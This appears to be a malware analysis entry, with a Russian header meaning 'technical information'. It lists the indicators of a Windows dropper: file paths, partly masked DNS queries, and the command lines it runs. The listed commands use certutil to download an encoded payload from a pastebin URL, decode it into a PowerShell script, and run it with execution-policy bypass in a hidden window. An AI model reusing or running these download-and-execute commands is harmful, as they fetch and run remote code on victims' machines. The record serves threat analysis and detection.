Техническая информация
- '<SYSTEM32>\cmd.exe' /kcertutil -urlcache -split -f https://pastebin.com/raw/XkgrNh0D c:\users\public\payload.enc& certutil -f -decode c:\users\public\payload.enc c:\users\public\string.ps1& powershell -executionpo...
- C:\users\public\payload.enc
- C:\users\public\string.ps1
- http://oc##.#tartssl.com/sub/class2/code/ca/MEMwQTA%2FMD0wOzAJBgUrDgMCGgUABBQSOgrhRCSnWfKxoWTjWxhk8hga9AQU0E4PQJlsuEsZbzsouODjiAc0qrcCAhAV
- DNS ASK pa###bin.com
- DNS ASK co#.###ooriemail.com
- DNS ASK oc##.#tartssl.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass -c iex c:\users\public\string.ps1
- '<SYSTEM32>\cmd.exe' /kcertutil -urlcache -split -f https://pastebin.com/raw/XkgrNh0D c:\users\public\payload.enc& certutil -f -decode c:\users\public\payload.enc c:\users\public\string.ps1& powershell -executionpo...' (со скрытым окном)
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://pastebin.com/raw/XkgrNh0D c:\users\public\payload.enc
- '<SYSTEM32>\certutil.exe' -f -decode c:\users\public\payload.enc c:\users\public\string.ps1